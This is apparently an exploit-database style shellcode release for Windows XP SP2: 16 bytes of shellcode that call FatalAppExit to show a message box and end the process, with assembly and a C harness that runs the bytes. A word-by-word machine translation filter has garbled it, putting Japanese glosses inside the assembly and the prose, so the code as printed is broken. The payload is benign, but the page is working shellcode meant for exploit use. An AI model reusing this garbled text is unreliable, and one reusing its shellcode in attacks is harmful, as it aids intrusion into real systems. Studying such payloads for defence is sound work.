このページはEtoJ逐語翻訳フィルタによって翻訳生成されました。

翻訳前ページへ


Windows - XP プロの/賛成の Sp2 English Message-Box Shellcode - 16 Bytes
+-----------------------------------------------------+
| Windows XP プロの/賛成の Sp2 English "Message-Box" Shellcode. |
+-----------------------------------------------------+

Size         : 16 Bytes, Null-解放する/自由な.
Author       : Aodrulez. 
Email        : f3arm3d3ar@gmail.com


Shellcode = "\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"
            "\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";


+--------------+
| Description: |
+--------------+

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I've used a 機能(する)/行事 called "FatalAppExit".
The 利益s are Three-倍の!

1] 陳列する,発揮するs a MessageBox.
2] 終結させるs the 過程. 
3] Its there in Kernel32.dll itself.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+-----------+
| Asm Code: |
+-----------+

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

shellcode:
 	      mov ecx,7c82dd38h ;"Admin" string in mem
 	      xor eax,eax
 	      mov ebx,7c860ad8h ;Addr of "FatalAppExit()" 
 		押し進める ecx          ;機能(する)/行事 from Kernel32
 		押し進める eax          
 		call ebx          ;App does a Clean 出口.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


+-----------------+
| Shellcodetest.c |
+-----------------+

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

char code[] = "\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"
              "\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";


int main(int argc, char **argv)
{
  int (*func)();
  func = (int (*)()) code;
  (int)(*func)();
}

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


+-------------------+
| Greetz 飛行機で行く Out To |
+-------------------+

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1] Amforked()	 : My 助言者.
2] The Blue Genius : My Boss.
3] www.orchidseven.com
4] str0ke

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+---------------------------------------------+
| 許す, O Lord, My Little Jokes on Thee,   |
| and I'll 許す Thy 広大な/多数の/重要な Big Joke on Me.  |
+---------------------------------------------+